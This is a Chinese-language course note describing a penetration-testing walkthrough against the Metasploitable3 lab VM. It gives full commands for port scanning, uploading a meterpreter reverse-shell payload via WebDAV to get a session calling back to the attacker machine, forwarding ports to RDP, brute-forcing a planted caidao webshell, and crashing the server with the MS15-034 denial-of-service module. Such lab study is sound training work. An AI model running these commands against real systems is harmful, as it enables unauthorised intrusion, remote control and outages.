zoukankan      html  css  js  c++  java
  • 5期-Metasploitable3专题课程

    metasploitable2基于ubantu的渗透演练环境。Rapid7官方长时间未更新,导致跟不上当前的节奏。metasploitable3出世。

    metasploitable2配合metasploit的模块进行使用,速度很快。

    metasploitable3更加难被攻破,有些漏洞在metasploit中没有漏洞利用模块,需要测试人员自己挖掘。

    一台metasploitable是不够用的,真实攻击中都会牵连到很多服务器和计算机,它可以扩展,将metasploitable3安装到多台终端内,建立相关节点。

    以下部分是渗透例子之一:从用nmap发现靶机存在多少端口,然后利用kali自带的DAVtest检测是否存在上传漏洞,到生成payload,到打开msf,加载exploit/multi/handler模块,设置好本地的端口与地址

    推荐参考资料:https://jingyan.baidu.com/article/7f766daf9cced24100e1d046.html    这是对win7系统的攻击

    面对靶机时,踩点:nmap网络扫描工具      【kali nmap的使用】

    nmap -sS -sV -v -n -p- -oX demon.xml 192.168.1.151      【内网靶机不需要解析DNS】 

    扫描结果关注到8585端口   存在 http   php   dav等应用     【对扫描结果的解读】

    DAVTest上传测试的可执行文件,渗透测试快,轻松确定是否启用DAV服务攻击。      【漏洞测试】

    msfvenom -p php/meterpreter_reverse_tcp  LHOST=192.168.1.152 LPORT=5555 -f raw >davtext.php    【生成反向链接攻击载荷,后门】

    msfconsole                   【生成载荷以后,本地也要启动服务】

    msf > use exploit/multi/handler                          【生成载荷以后,本地也要启动服务】

    set PAYLOAD php/meterpreter_reverse_tcp              【生成载荷以后,本地也要启动服务】

    show options                     【看一些设置有些什么东西】

    set LHOST 192.168.1.152      

    set LPORT 5555                【设置一下,跟载荷对应上】

    davtest               【看一下帮助信息,用于生成以下命令】

    davtest -url http://192.168.1.151:8585/uploads -uploadfile davtest.php -uploadloc DavTestDirXp317s2YNZmKZKU/demon.php  【上传攻击载荷到靶机】

    exploit         【处于监听状态,靶机一点文件这个地方就会弹出meterpreter会话】

    help      【看一下meterpreter的帮助信息】

    shell       【跟dos命令差不多】

    rdesktop 192.168.1.151:3389           【手动链接一下远程桌面,看看有没有防火墙】

    portfwd -h           【看一下meterpreter的端口转发帮助信息】

    portfwd add -l 7777 -p 3389 -r 192.168.1.151       【将本机的7777端口转发到目标机的3389端口】

    rdesktop   127.0.0.1:7777                【本地转发设置好了以后,访问本地就等于访问了目标机,这就是转发的情况体现】

    meterpreter > background       【退出】

    msf exploit(handler) >  back    【退出】

    msf > services 

    msf > workspace  -a davtest     【创建一个工作区】

    msf > db_                【看一下数据库功能】

    msf > db_import demon.xml   【数据库导入看一下扫描结果的报告】

    msf > services  【看一下扫描结果的报告】

    ssh -L 3389:loaclhost:3389 vagrant@192.168.1.151       【将本机3389转发到对方3389,这里需要寻找ssh的账号密码】

    nmap -p 3389 192.168.1.151           【扫描一下3389】

    nmap -p 3389 127.0.0.1         【扫描一下本机的3389】

    rdesktop   127.0.0.1:3389        【设置好本地的端口转发后,直接访问本地就等于访问目标机器的IP+端口】

    官方wiki      无语了,中国菜刀都被他们看见了。

    https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities

    1.chinese caidao   ----中国菜刀,加入了中国菜刀元素:一句话木马       位置:http://localhost/caidao.asp

    2.80端口 --http    MS15-034/CVE-2015-1635  HTTP远程代码执行漏洞(远程蓝屏代码)(远程溢出漏洞)

    微软IIS 6.0以上的windows server 2008 R2/2012/2012 R2以及windows 7/8/8.1系统都会受到这个漏洞影响

    模块位置   msf:use  auxiliary/dos/http/ms15_034_ulonglongadd 

    进阶:如果找到其他应用软件的各种漏洞利用模块,如上,要弄一个人将变得极其简单化。   

    【危害还是非常大的,不要玩火,不得攻击他人。打不过你报警来凑】   

    msf > search caidao                 【漏洞利用模块举例】

    msf > use auxiliary/scanner/http/caidao_bruteforce_login                  【菜刀扫描模块】

    show options       【查看设置】

    set RHOSTS 192.168.1.151          【设置目标机】

    set THREADS 10   【设置线程】

    set TARGETURI /caidao.asp

    run            

    search ms 15_034      【搜索远程蓝屏代码漏洞编号】

    use auxiliary/dos/http/ms15_034_ulonglongadd          【执行蓝屏代码漏洞的载荷模块】

    show options       

    set RHOSTS 192.168.1.151  

    exploit             【服务器马上蓝屏】

    其他参考资料

    hacking metasploitable 2 

    http://www.youtube.com/watch?v=jDqmEY_3zY&t=1625s&index=3&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

    www.youtube.com/watch?v=JoV1aSuy1XU&index=4&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

    www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&t=33393s&index=1

    MSF精华合集      ZANYAR MATRIX发布的

    www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&index=1&spfreload=10

    书籍   

    菜鸟腾飞 :metasploit渗透测试平台之应用 --飞飞  

    T00LS metasploit  第一季度 第二季   ---羽翼

  • 相关阅读:
    PHP 开发 APP 接口 学习笔记与总结
    Java实现 LeetCode 43 字符串相乘
    Java实现 LeetCode 43 字符串相乘
    Java实现 LeetCode 43 字符串相乘
    Java实现 LeetCode 42 接雨水
    Java实现 LeetCode 42 接雨水
    Java实现 LeetCode 42 接雨水
    Java实现 LeetCode 41 缺失的第一个正数
    Java实现 LeetCode 41 缺失的第一个正数
    Java实现 LeetCode 41 缺失的第一个正数
  • 原文地址:https://www.cnblogs.com/sec875/p/10801489.html
Copyright © 2011-2022 走看看